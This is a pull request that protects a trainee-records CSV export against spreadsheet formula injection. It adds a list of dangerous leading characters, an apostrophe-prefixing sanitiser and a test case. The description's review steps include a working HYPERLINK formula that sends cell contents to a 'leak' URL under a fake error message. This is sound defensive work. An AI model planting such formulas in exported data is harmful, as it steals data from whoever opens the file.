### PR TITLE
[2255] Set quote character to apostrophe for csv generation

### DIFF
--- a/app/services/exports/trainee_search_data.rb
+++ b/app/services/exports/trainee_search_data.rb
@@ -9,7 +9,7 @@ module Exports
     def data
       header_row ||= data_for_export.first&.keys
 
-      CSV.generate(headers: true) do |rows|
+      CSV.generate(headers: true, quote_char: "'") do |rows|
         rows << header_row
 
         data_for_export.map(&:values).each do |value|

--- a/app/services/exports/trainee_search_data.rb
+++ b/app/services/exports/trainee_search_data.rb
@@ -2,6 +2,8 @@
 
 module Exports
   class TraineeSearchData
+    VULNERABLE_CHARACTERS = ["=", "+", "-", "@"].freeze
+
     def initialize(trainees, include_provider: false)
       @data_for_export = format_trainees(trainees, include_provider)
     end
@@ -9,7 +11,7 @@ module Exports
     def data
       header_row ||= data_for_export.first&.keys
 
-      CSV.generate(headers: true, quote_char: "'") do |rows|
+      CSV.generate(headers: true) do |rows|
         rows << header_row
 
         data_for_export.map(&:values).each do |value|
@@ -29,9 +31,9 @@ module Exports
     def format_trainees(trainees, include_provider)
       trainees.map do |trainee|
         {
-          "First name" => trainee.first_names,
-          "Last name" => trainee.last_name,
-          "Trainee Id" => trainee.trainee_id,
+          "First name" => sanitise(trainee.first_names),
+          "Last name" => sanitise(trainee.last_name),
+          "Trainee Id" => sanitise(trainee.trainee_id),
           "TRN" => trainee.trn,
           "Status" => status(trainee),
           "Route" => trainee.training_route,
@@ -43,13 +45,17 @@ module Exports
           "TRN Submitted date" => trainee.submitted_for_trn_at,
           "Award submitted date" => trainee.recommended_for_award_at,
         }.tap do |fields|
-          fields.merge!("Provider Name" => trainee.provider.name) if include_provider
+          fields.merge!("Provider Name" => sanitise(trainee.provider.name)) if include_provider
         end
       end
     end
 
     def status(trainee)
       I18n.t("activerecord.attributes.trainee.states.#{trainee.state}", award_type: trainee.award_type)
+    end
+
+    def sanitise(value)
+      value&.start_with?(*VULNERABLE_CHARACTERS) ? value.prepend("'") : value
     end
   end
 end

--- a/spec/services/exports/trainee_search_data_spec.rb
+++ b/spec/services/exports/trainee_search_data_spec.rb
@@ -37,6 +37,16 @@ module Exports
         expect(subject.data).to include(expected_output.values.join(","))
       end
 
+      context "when names contain whitespace or vulnerable characters" do
+        before do
+          trainee.update!(first_names: "Christophe", last_name: "=SUM(A1&A2)")
+        end
+
+        it "adds an apostrophe before vulnerable characters" do
+          expect(subject.data).to include("Christophe,'=SUM(A1&A2)")
+        end
+      end
+
       context "with provider option enabled" do
         subject { described_class.new([trainee], include_provider: true) }
 


### PR DESCRIPTION
### Context
Sanitise the free-text data that is output in the CSV file to ensure that Excel does not interpret them as formulae.

#### Current
![image](https://user-images.githubusercontent.com/910019/127309491-744b52c8-deb6-4d90-b63a-62cae85df17b.png)
#### Proposed
![image](https://user-images.githubusercontent.com/910019/127309568-371ae4d8-ba54-4736-8d1b-791daf746368.png)


### Changes proposed in this pull request
For fields starting with any of "=", "+", "-", "@" characters, add a leading apostrophe, to prevent programs like excel interpreting them as formula. 

### Guidance to review
1. Add a trainee name starting with any of these four characters. I used ` =HYPERLINK("https://localhost:5000?leak="&A1&B1,"Error: please click for further information")`
2. On the trainee records page, choose to export them, and open the csv in excel or openoffice.
3. Expect that the above row is not being interpreted as an excel formula.
